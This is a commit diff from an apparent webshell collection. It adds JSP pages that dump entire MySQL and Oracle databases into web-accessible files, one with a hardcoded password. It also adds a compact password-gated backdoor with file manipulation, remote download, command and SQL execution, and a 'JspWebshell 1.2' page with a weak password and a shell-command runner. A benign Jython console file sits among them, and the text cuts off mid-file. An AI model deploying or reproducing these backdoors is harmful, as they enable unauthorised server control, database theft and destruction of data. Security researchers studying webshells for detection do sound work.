mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
update jsp
This commit is contained in:
parent
e3ca3b3df7
commit
6faad041a0
29 changed files with 13147 additions and 0 deletions
89
drag/mysql_jsp脱裤.txt
Normal file
89
drag/mysql_jsp脱裤.txt
Normal file
|
@ -0,0 +1,89 @@
|
|||
<%@ page import="java.sql.*" %>
|
||||
<%@ page import="java.util.*" %>
|
||||
<%@ page import="java.io.*" %>
|
||||
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
|
||||
<%
|
||||
try {
|
||||
//±¸·ގļ<DE8E>ľ<EFBFBD>¾¶
|
||||
String backupDir = "/home/tomcat-oa/webapps/ROOT/video/ab1/";
|
||||
String ex=".txt";
|
||||
String driver = "com.mysql.jdbc.Driver";
|
||||
|
||||
String url = "jdbc:mysql://localhost:3306/oa";
|
||||
String username = "oa";
|
||||
String password = "LOa2(2.DX,v>15^td8nWe!L";
|
||||
|
||||
Class.forName(driver);
|
||||
Connection conn = DriverManager.getConnection(url, username, password);
|
||||
|
||||
// Get tables
|
||||
DatabaseMetaData dmd = conn.getMetaData();
|
||||
ResultSet rs = dmd.getTables(null, null, "%", null);
|
||||
ArrayList<String> tables = new ArrayList<String>();
|
||||
while (rs.next()) {
|
||||
tables.add(rs.getString(3));
|
||||
}
|
||||
rs.close();
|
||||
|
||||
|
||||
|
||||
ResultSetMetaData rsmd = null;
|
||||
Statement stmt = conn.createStatement();
|
||||
for (String table : tables) {
|
||||
|
||||
rs = stmt.executeQuery("SHOW CREATE TABLE " + table);
|
||||
rsmd = rs.getMetaData();
|
||||
while (rs.next()) {
|
||||
/*
|
||||
* mysql> SHOW CREATE TABLE t\G
|
||||
*************************** 1. row ***************************
|
||||
* Table: t
|
||||
* Create Table: CREATE TABLE t (
|
||||
* id int(11) default NULL auto_increment,
|
||||
* s char(60) default NULL,
|
||||
* PRIMARY KEY (id)
|
||||
* ) TYPE=MyISAM
|
||||
*/
|
||||
// JDBC is 1-based, Java is not !?
|
||||
// osw.append(rs.getString(2) + "\n\n");
|
||||
}
|
||||
rs.close();
|
||||
|
||||
out.println("Dumping data for table " + table + "...<br />");
|
||||
OutputStreamWriter osw = new OutputStreamWriter(new FileOutputStream(backupDir+table+ex), "UTF-8");
|
||||
BufferedWriter bw=new BufferedWriter(osw);
|
||||
rs = stmt.executeQuery("SELECT * FROM " + table);
|
||||
rsmd = rs.getMetaData();
|
||||
while (rs.next()) {
|
||||
bw.append("INSERT INTO " + table + " VALUES(");
|
||||
// JDBC is 1-based, Java is not !?
|
||||
for (int col = 1; col <= rsmd.getColumnCount(); col++) {
|
||||
bw.append("'");
|
||||
if (rs.getString(col) == null)
|
||||
bw.append("");
|
||||
else
|
||||
bw.append(rs.getString(col));
|
||||
if (col == rsmd.getColumnCount())
|
||||
bw.append("'");
|
||||
else
|
||||
bw.append("',");
|
||||
}
|
||||
bw.append(");");
|
||||
bw.newLine();
|
||||
}
|
||||
bw.flush();
|
||||
bw.close();
|
||||
osw.close();
|
||||
rs.close();
|
||||
}
|
||||
stmt.close();
|
||||
|
||||
out.println("backup is ok");
|
||||
|
||||
conn.close();
|
||||
} catch (Exception e) {
|
||||
response.setStatus(200);
|
||||
e.printStackTrace();
|
||||
}
|
||||
out.println("<p><h3>finished</h3></p>");
|
||||
%>
|
321
drag/oracle_jsp脱裤.txt
Normal file
321
drag/oracle_jsp脱裤.txt
Normal file
|
@ -0,0 +1,321 @@
|
|||
<%@ page language="java" import="java.util.*" pageEncoding="GBK"%>
|
||||
|
||||
<%@ page import="oracle.jdbc.*"%>
|
||||
|
||||
<%@ page import="java.sql.*" %>
|
||||
|
||||
<%@ page contentType="text/html; charset=GBK" %>
|
||||
|
||||
<%@ page import="java.io.*" %>
|
||||
|
||||
<%
|
||||
|
||||
String path = request.getContextPath();
|
||||
|
||||
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
|
||||
|
||||
%>
|
||||
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
|
||||
<html>
|
||||
|
||||
<head>
|
||||
|
||||
<base href="<%=basePath%>">
|
||||
|
||||
|
||||
|
||||
<title>XXOO</title>
|
||||
|
||||
<meta http-equiv="pragma" content="no-cache">
|
||||
|
||||
<meta http-equiv="cache-control" content="no-cache">
|
||||
|
||||
<meta http-equiv="expires" content="0">
|
||||
|
||||
<meta http-equiv="keywords" content="keyword1,keyword2,keyword3">
|
||||
|
||||
<meta http-equiv="description" content="This is my page">
|
||||
|
||||
<!--
|
||||
|
||||
<link rel="stylesheet" type="text/css" href="styles.css" mce_href="styles.css">
|
||||
|
||||
-->
|
||||
|
||||
</head>
|
||||
|
||||
|
||||
|
||||
<body>
|
||||
|
||||
<%
|
||||
|
||||
String url = "http://" + request.getServerName() + ":" + request.getServerPort() + request.getContextPath()+request.getServletPath();
|
||||
|
||||
Class.forName("oracle.jdbc.driver.OracleDriver").newInstance();
|
||||
|
||||
ResultSet rs=null;
|
||||
|
||||
ResultSet rs_column=null;
|
||||
|
||||
ResultSet rs_dump=null;
|
||||
|
||||
String oraUrl="jdbc:oracle:thin:@192.168.1.81:1521:db";
|
||||
|
||||
String oraUser="username";
|
||||
|
||||
String oraPWD="password";
|
||||
|
||||
int size=30000;
|
||||
|
||||
try
|
||||
|
||||
{
|
||||
|
||||
DriverManager.registerDriver(new oracle.jdbc.driver.OracleDriver());
|
||||
|
||||
}
|
||||
|
||||
catch (SQLException e){
|
||||
|
||||
out.print("filed!!");
|
||||
|
||||
}
|
||||
|
||||
try
|
||||
|
||||
{
|
||||
|
||||
Connection conn=DriverManager.getConnection(oraUrl,oraUser,oraPWD);
|
||||
|
||||
conn.setAutoCommit(false);
|
||||
|
||||
if (request.getParameter("table") == null || request.getParameter("table").equals(""))
|
||||
|
||||
{
|
||||
|
||||
out.print("xixi...<br>");
|
||||
|
||||
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
|
||||
|
||||
rs=stmt.executeQuery("select table_name from all_tables");
|
||||
|
||||
while(rs.next())
|
||||
|
||||
{
|
||||
|
||||
out.print("<a href=");out.print(url);out.print("?table=");out.print(rs.getString(1));
|
||||
|
||||
out.print(" target=_blank>");out.print(rs.getString(1));out.print("</a><br>");
|
||||
|
||||
}
|
||||
|
||||
rs.close();
|
||||
|
||||
stmt.close();
|
||||
|
||||
}
|
||||
|
||||
else
|
||||
|
||||
{
|
||||
|
||||
out.print("Current table : "+request.getParameter("table"));
|
||||
|
||||
String sql_count="select count(*) from all_tab_columns where Table_Name='"+request.getParameter("table")+"'";
|
||||
|
||||
String sql_column="select * from all_tab_columns where Table_Name='"+request.getParameter("table")+"'";
|
||||
|
||||
String sql_columns_count="select count(*) from "+request.getParameter("table");
|
||||
|
||||
//String sql_dump="select rownom ro,* from T_SYS_USER";
|
||||
|
||||
Statement stmt_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
|
||||
|
||||
Statement stmt_column=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
|
||||
|
||||
Statement stmt_columns_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
|
||||
|
||||
rs=stmt_count.executeQuery(sql_count);
|
||||
|
||||
rs_column=stmt_column.executeQuery(sql_column);
|
||||
|
||||
ResultSet rs_columns_count=null;
|
||||
|
||||
rs_columns_count=stmt_columns_count.executeQuery(sql_columns_count);
|
||||
|
||||
|
||||
|
||||
conn.commit();
|
||||
|
||||
int count=0;
|
||||
|
||||
while(rs.next())
|
||||
|
||||
{
|
||||
|
||||
count=Integer.parseInt(rs.getString(1));
|
||||
|
||||
//out.print(count);
|
||||
|
||||
}
|
||||
|
||||
int columns_count=0;
|
||||
|
||||
while(rs_columns_count.next()) // Total number of records
|
||||
|
||||
{
|
||||
|
||||
columns_count=Integer.parseInt(rs_columns_count.getString(1));
|
||||
|
||||
out.print("<br>The number of records : "+columns_count+"<br>");
|
||||
|
||||
}
|
||||
|
||||
//out.print(columns_count);
|
||||
|
||||
int column_num=1;
|
||||
|
||||
//out.print("<table border='1'>");out.print("<tr>");
|
||||
|
||||
String sql_dump="select * from (select rownum ro "; //SELECT
|
||||
|
||||
while(rs_column.next())
|
||||
|
||||
{
|
||||
|
||||
//out.print(rs_column.getString(3));out.print("\r");
|
||||
|
||||
sql_dump+=",";
|
||||
|
||||
sql_dump+=rs_column.getString(3);
|
||||
|
||||
column_num+=1;
|
||||
|
||||
|
||||
|
||||
}
|
||||
|
||||
rs_column.close();
|
||||
|
||||
rs.close(); //close
|
||||
|
||||
stmt_count.close();
|
||||
|
||||
stmt_column.close();
|
||||
|
||||
sql_dump+=" from "+request.getParameter("table")+" where rownum<=";
|
||||
|
||||
int mark=0;
|
||||
|
||||
mark=columns_count;
|
||||
|
||||
out.print("<br><br><br>Please download:<br>");
|
||||
|
||||
while(true)
|
||||
|
||||
{
|
||||
|
||||
if(mark<=size) //one txt count
|
||||
|
||||
{ mark=0; }
|
||||
|
||||
else
|
||||
|
||||
{ mark=mark-size; }
|
||||
|
||||
String dump=sql_dump+columns_count+") where ro>="+mark;
|
||||
|
||||
columns_count-=size;
|
||||
|
||||
Statement stmt_dump=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
|
||||
|
||||
rs_dump= stmt_dump.executeQuery(dump);
|
||||
|
||||
conn.commit();
|
||||
|
||||
String filename = request.getRealPath(request.getParameter("table")+"-"+mark+".txt");
|
||||
|
||||
java.io.File f = new java.io.File(filename);
|
||||
|
||||
if(!f.exists())
|
||||
|
||||
{ f.createNewFile(); }
|
||||
|
||||
try
|
||||
|
||||
{
|
||||
|
||||
PrintWriter pw = new PrintWriter(new FileOutputStream(filename));
|
||||
|
||||
while(rs_dump.next())
|
||||
|
||||
{
|
||||
|
||||
column_num=1;
|
||||
|
||||
while(column_num<=count)
|
||||
|
||||
{
|
||||
|
||||
pw.print(rs_dump.getString(column_num));
|
||||
|
||||
pw.print(",");
|
||||
|
||||
column_num+=1;
|
||||
|
||||
}
|
||||
|
||||
pw.println("");
|
||||
|
||||
}
|
||||
|
||||
pw.close();
|
||||
|
||||
}
|
||||
|
||||
catch(IOException e) {
|
||||
|
||||
out.println(e.getMessage());
|
||||
|
||||
}
|
||||
|
||||
out.println("<br><a href=./"+request.getParameter("table")+"-"+mark+".txt>"+request.getParameter("table")+"-"+mark+".txt</a><br>");
|
||||
|
||||
if(mark==0)
|
||||
|
||||
{
|
||||
|
||||
rs_dump.close();
|
||||
|
||||
stmt_dump.close();
|
||||
|
||||
break;
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
conn.close();
|
||||
|
||||
} catch (SQLException e)
|
||||
|
||||
{
|
||||
|
||||
System.out.println(e.toString());
|
||||
|
||||
out.print(e.toString());
|
||||
|
||||
}
|
||||
|
||||
%>
|
||||
|
||||
</body>
|
||||
|
||||
|
||||
|
||||
</html>
|
59
jsp/hackk8/JSP/Customize.jsp
Normal file
59
jsp/hackk8/JSP/Customize.jsp
Normal file
|
@ -0,0 +1,59 @@
|
|||
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
|
||||
<%!
|
||||
String Pwd="k8";
|
||||
String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
|
||||
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
|
||||
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
|
||||
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
|
||||
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
|
||||
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
|
||||
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
|
||||
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
|
||||
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
|
||||
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
|
||||
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
|
||||
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
|
||||
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
|
||||
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
|
||||
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
|
||||
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
|
||||
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
|
||||
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
|
||||
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
|
||||
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
|
||||
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
|
||||
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
|
||||
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
|
||||
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
|
||||
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
|
||||
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
|
||||
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
|
||||
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
|
||||
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
|
||||
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
|
||||
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
|
||||
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
|
||||
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
|
||||
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
|
||||
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
|
||||
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
|
||||
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
|
||||
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
|
||||
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
|
||||
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
|
||||
%><%
|
||||
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
|
||||
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
|
||||
StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
|
||||
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
|
||||
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
|
||||
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
|
||||
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
|
||||
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
|
||||
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
|
||||
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
|
||||
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
|
||||
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
|
||||
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
|
||||
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
|
||||
%>
|
BIN
jsp/hackk8/JSP/JSP无组件实现WEB上传.rar
Normal file
BIN
jsp/hackk8/JSP/JSP无组件实现WEB上传.rar
Normal file
Binary file not shown.
125
jsp/hackk8/JSP/Java Shell.jsp
Normal file
125
jsp/hackk8/JSP/Java Shell.jsp
Normal file
|
@ -0,0 +1,125 @@
|
|||
package enigma.shells.jython;
|
||||
|
||||
import java.io.*;
|
||||
import java.awt.*;
|
||||
import javax.swing.*;
|
||||
|
||||
import enigma.console.*;
|
||||
import enigma.console.java2d.*;
|
||||
|
||||
import org.python.core.*;
|
||||
import org.python.util.*;
|
||||
|
||||
public class JythonShell extends JPanel implements Runnable {
|
||||
public static int DEFAULT_ROWS = 20;
|
||||
public static int DEFAULT_COLUMNS = 80;
|
||||
public static int DEFAULT_SCROLLBACK = 100;
|
||||
|
||||
public PrintStream out;
|
||||
|
||||
public Console console;
|
||||
public Java2DTextWindow text;
|
||||
public JScrollPane scrollPane;
|
||||
public PythonInterpreter interp;
|
||||
|
||||
private Color colorBackground = new Color(0, 0, 0);
|
||||
private Color colorForeground = new Color(187, 187, 187);
|
||||
private Color colorError = new Color(187, 0, 0);
|
||||
private Color colorCursor = new Color(187, 187, 0);
|
||||
|
||||
public JythonShell() {
|
||||
this(null, Py.getSystemState());
|
||||
}
|
||||
|
||||
public JythonShell(PyObject dict) {
|
||||
this(dict, Py.getSystemState());
|
||||
}
|
||||
|
||||
public JythonShell(int columns, int rows, int scrollback) {
|
||||
this(null, Py.getSystemState(), columns, rows, scrollback);
|
||||
}
|
||||
|
||||
public JythonShell(PyObject dict, PySystemState systemState) {
|
||||
this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK);
|
||||
}
|
||||
|
||||
public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) {
|
||||
super(new BorderLayout());
|
||||
|
||||
text = new Java2DTextWindow(columns, rows, scrollback);
|
||||
text.setBackground(colorBackground);
|
||||
|
||||
scrollPane = new JScrollPane();
|
||||
scrollPane.setViewportView(text);
|
||||
|
||||
add(scrollPane, BorderLayout.CENTER);
|
||||
|
||||
console = new DefaultConsoleImpl(text);
|
||||
out = console.getOutputStream();
|
||||
|
||||
interp = new PythonInterpreter(dict, systemState);
|
||||
interp.setOut(out);
|
||||
interp.setErr(out);
|
||||
}
|
||||
|
||||
public void run() {
|
||||
int pos = 0;
|
||||
int tbs = 4;
|
||||
|
||||
String line = "";
|
||||
String command = "";
|
||||
|
||||
for (;;) {
|
||||
String space = "";
|
||||
for (int i = 0; i < pos * tbs; i++) {
|
||||
space += " ";
|
||||
}
|
||||
|
||||
try {
|
||||
console.setTextAttributes(new TextAttributes(colorCursor));
|
||||
|
||||
if (pos > 0) {
|
||||
out.print(space + "... ");
|
||||
} else {
|
||||
out.print(">> ");
|
||||
}
|
||||
|
||||
console.setTextAttributes(new TextAttributes(colorForeground));
|
||||
|
||||
line = console.readLine().trim();
|
||||
if (line.length() == 0 && pos > 0) {
|
||||
pos--;
|
||||
} else if (line.endsWith(":")) {
|
||||
command += space + line + "\n";
|
||||
pos++;
|
||||
} else {
|
||||
command += space + line + "\n";
|
||||
}
|
||||
|
||||
if (pos == 0) {
|
||||
interp.exec(command);
|
||||
command = "";
|
||||
}
|
||||
} catch (Exception e) {
|
||||
console.setTextAttributes(new TextAttributes(colorError));
|
||||
|
||||
e.printStackTrace();
|
||||
command = "";
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
public static void main(String[] argv) {
|
||||
PySystemState.initialize(System.getProperties(), null, argv);
|
||||
|
||||
JFrame frame = new JFrame("Jython Console");
|
||||
JythonShell console = new JythonShell();
|
||||
|
||||
frame.add(console, BorderLayout.CENTER);
|
||||
frame.pack();
|
||||
frame.setVisible(true);
|
||||
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
|
||||
|
||||
console.run();
|
||||
}
|
||||
}
|
788
jsp/hackk8/JSP/JspWebshell 1.2.jsp
Normal file
788
jsp/hackk8/JSP/JspWebshell 1.2.jsp
Normal file
|
@ -0,0 +1,788 @@
|
|||
<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
|
||||
<%
|
||||
/**
|
||||
* <p>Title:JspWebshell </p>
|
||||
*
|
||||
* <p>Description: jsp网站管理</p>
|
||||
*
|
||||
* <p>Copyright:绝对零度[B.C.T] Copyright (c) 2006</p>
|
||||
*
|
||||
* <p>Company: zero.cnbct.org</p>
|
||||
* PS:本程序是小弟处于兴趣所写,如有疑问请联系QQ:48124012
|
||||
* @version 1.2
|
||||
*/
|
||||
String path="";
|
||||
String selfName="";
|
||||
boolean copyfinish=false;
|
||||
%>
|
||||
<% selfName=request.getRequestURI();
|
||||
// String editfile="";
|
||||
String editfile=request.getParameter("editfile");
|
||||
if (editfile!=null)
|
||||
{editfile=new String(editfile.getBytes("ISO8859_1"));
|
||||
}
|
||||
path=request.getParameter("path");
|
||||
if(path==null)
|
||||
path=config.getServletContext().getRealPath("/");
|
||||
%>
|
||||
<%!
|
||||
String _password ="111";//密码
|
||||
public String readAllFile(String filePathName) throws IOException
|
||||
{
|
||||
FileReader fr = new FileReader(filePathName);
|
||||
int count = fr.read();
|
||||
String res="";
|
||||
while(count != -1)
|
||||
{
|
||||
//System.out.print((char)count);
|
||||
res=res+(char)count;
|
||||
count = fr.read();
|
||||
if(count == 13)
|
||||
{
|
||||
fr.skip(1);
|
||||
}
|
||||
}
|
||||
fr.close();
|
||||
return res;
|
||||
}
|
||||
public void writeFile(String filePathName,String args) throws IOException
|
||||
{
|
||||
FileWriter fw = new FileWriter(filePathName);
|
||||
PrintWriter out=new PrintWriter(fw);
|
||||
out.write(args);
|
||||
out.println();
|
||||
out.flush();
|
||||
fw.close();
|
||||
out.close();
|
||||
}
|
||||
public boolean createFile(String filePathName) throws IOException
|
||||
{
|
||||
boolean result = false;
|
||||
File file = new File(filePathName);
|
||||
if(file.exists())
|
||||
{
|
||||
System.out.println("文件已经存在!");
|
||||
}
|
||||
else
|
||||
{
|
||||
file.createNewFile();
|
||||
result = true;
|
||||
System.out.println("文件已经创建!");
|
||||
}
|
||||
return result;
|
||||
}
|
||||
public boolean createFolder(String fileFolderName)
|
||||
{
|
||||
boolean result = false;
|
||||
try
|
||||
{
|
||||
File file = new File(fileFolderName);
|
||||
if(file.exists())
|
||||
{
|
||||
//file.delete();
|
||||
System.out.println("目录已经存在!");
|
||||
result = true;
|
||||
}
|
||||
else
|
||||
{
|
||||
file.mkdir();
|
||||
System.out.println("目录已经建立!");
|
||||
result = true;
|
||||
}
|
||||
}
|
||||
catch(Exception ex)
|
||||
{
|
||||
result = false;
|
||||
System.out.println("CreateAndDeleteFolder is error:"+ex);
|
||||
}
|
||||
return result;
|
||||
}
|
||||
|
||||
public boolean DeleteFolder(String filefolderName)
|
||||
{
|
||||
boolean result = false;
|
||||
try
|
||||
{
|
||||
File file = new File(filefolderName);
|
||||
if(file.exists())
|
||||
{
|
||||
file.delete();
|
||||
System.out.println("目录已删除!");
|
||||
result = true;
|
||||
}
|
||||
}
|
||||
catch(Exception ex)
|
||||
{
|
||||
result = false;
|
||||
System.out.println("CreateAndDeleteFolder is error:"+ex);
|
||||
}
|
||||
return result;
|
||||
}
|
||||
public boolean validate(String password) {
|
||||
if (password.equals(_password)) {
|
||||
return true;
|
||||
} else {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
public String HTMLEncode(String str) {
|
||||
str = str.replaceAll(" ", " ");
|
||||
str = str.replaceAll("<", "<");
|
||||
str = str.replaceAll(">", ">");
|
||||
str = str.replaceAll("\r\n", "<br>");
|
||||
|
||||
return str;
|
||||
}
|
||||
public String exeCmd(String cmd) {
|
||||
Runtime runtime = Runtime.getRuntime();
|
||||
Process proc = null;
|
||||
String retStr = "";
|
||||
InputStreamReader insReader = null;
|
||||
char[] tmpBuffer = new char[1024];
|
||||
int nRet = 0;
|
||||
|
||||
try {
|
||||
proc = runtime.exec(cmd);
|
||||
insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
|
||||
while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
|
||||
retStr += new String(tmpBuffer, 0, nRet);
|
||||
}
|
||||
|
||||
insReader.close();
|
||||
retStr = HTMLEncode(retStr);
|
||||
} catch (Exception e) {
|
||||
retStr = "<font color=\"red\">命令错误\"" + cmd + "\"";
|
||||
} finally {
|
||||
return retStr;
|
||||
}
|
||||
}
|
||||
public boolean fileCopy(String srcPath, String dstPath) {
|
||||
boolean bRet = true;
|
||||
|
||||
try {
|
||||
FileInputStream in = new FileInputStream(new File(srcPath));
|
||||
FileOutputStream out = new FileOutputStream(new File(dstPath));
|
||||
byte[] buffer = new byte[1024];
|
||||
int nBytes;
|
||||
|
||||
|
||||
while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
|
||||
out.write(buffer, 0, nBytes);
|
||||
}
|
||||
|
||||
in.close();
|
||||
out.close();
|
||||
} catch (IOException e) {
|
||||
bRet = false;
|
||||
}
|
||||
|
||||
return bRet;
|
||||
}
|
||||
class EnvServlet
|
||||
{
|
||||
public long timeUse=0;
|
||||
public Hashtable htParam=new Hashtable();
|
||||
private Hashtable htShowMsg=new Hashtable();
|
||||
public void setHashtable()
|
||||
{
|
||||
Properties me=System.getProperties();
|
||||
Enumeration em=me.propertyNames();
|
||||
while(em.hasMoreElements())
|
||||
{
|
||||
String strKey=(String)em.nextElement();
|
||||
String strValue=me.getProperty(strKey);
|
||||
htParam.put(strKey,strValue);
|
||||
}
|
||||
}
|
||||
public void getHashtable(String strQuery)
|
||||
{
|
||||
Enumeration em=htParam.keys();
|
||||
while(em.hasMoreElements())
|
||||
{
|
||||
String strKey=(String)em.nextElement();
|
||||
String strValue=new String();
|
||||
if(strKey.indexOf(strQuery,0)>=0)
|
||||
{
|
||||
strValue=(String)htParam.get(strKey);
|
||||
htShowMsg.put(strKey,strValue);
|
||||
}
|
||||
}
|
||||
}
|
||||
public String queryHashtable(String strKey)
|
||||
{
|
||||
strKey=(String)htParam.get(strKey);
|
||||
return strKey;
|
||||
}
|
||||
/* public long test_int()
|
||||
{
|
||||
long timeStart = System.currentTimeMillis();
|
||||
int i=0;
|
||||
while(i<3000000)i++;
|
||||
long timeEnd = System.currentTimeMillis();
|
||||
long timeUse=timeEnd-timeStart;
|
||||
return timeUse;
|
||||
}
|
||||
public long test_sqrt()
|
||||
{
|
||||
long timeStart = System.currentTimeMillis();
|
||||
int i=0;
|
||||
double db=(double)new Random().nextInt(1000);
|
||||
while(i<200000){db=Math.sqrt(db);i++;}
|
||||
long timeEnd = System.currentTimeMillis();
|
||||
long timeUse=timeEnd-timeStart;
|
||||
return timeUse;
|
||||
}*/
|
||||
}
|
||||
%>
|
||||
<%
|
||||
EnvServlet env=new EnvServlet();
|
||||
env.setHashtable();
|
||||
//String action=new String(" ");
|
||||
//String act=new String("action");
|
||||
//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
|
||||
%>
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
|
||||
<title>JspWebShell By 绝对零度</title>
|
||||
<style>
